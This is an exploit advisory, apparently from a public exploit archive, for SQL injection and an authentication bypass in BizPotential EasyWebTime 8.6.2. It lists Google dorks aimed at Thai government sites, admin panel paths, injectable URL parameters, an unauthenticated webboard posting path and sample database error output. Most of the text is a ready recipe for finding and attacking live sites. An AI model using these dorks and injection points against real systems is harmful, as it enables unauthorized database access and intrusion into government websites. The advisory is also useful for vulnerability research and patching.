############################################################# # Exploit Title : BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 14/02/2019 # Vendor Homepage : bizpotential.com ~ ewtadmin.com # Software Information Link : bizpotential.com/overview.php # Software Affected Version : 8.6.2 and all previous versions. # Software Price : 100$ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-592 - Authentication Bypass Issues # CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018090088 ############################################################# BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability ############################################################# # Google Dorks : ***************** inurl:''/ewtadmin/'' site:go.th inurl:''/main.php?filename='' site:go.th inurl:''/ewtadmin/ewt/ccs/'' intext:''(c) Copyright 2007 - BizPotential.com - All Rights Reserved.'' intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved'' ############################################################# # Admin Control Panel Paths : *************************** /ewtadmin/index.php /ewtadmin82/ /ewtcommittee/index2331.php /ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php ############################################################# # SQL Injection Exploit : *********************** /n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection] /ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection] /more_news.php?offset=[SQL Injection] /more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection] ############################################################# # Webboard Exploit Bypass : ************************** /ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard # Webboard Directory Path : ************************** /ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard /index_question.php?wcad=5&t=1&filename=webboard ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard ############################################################# # Example SQL Database Errors => ******************************** SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1 SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1 ############################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #############################################################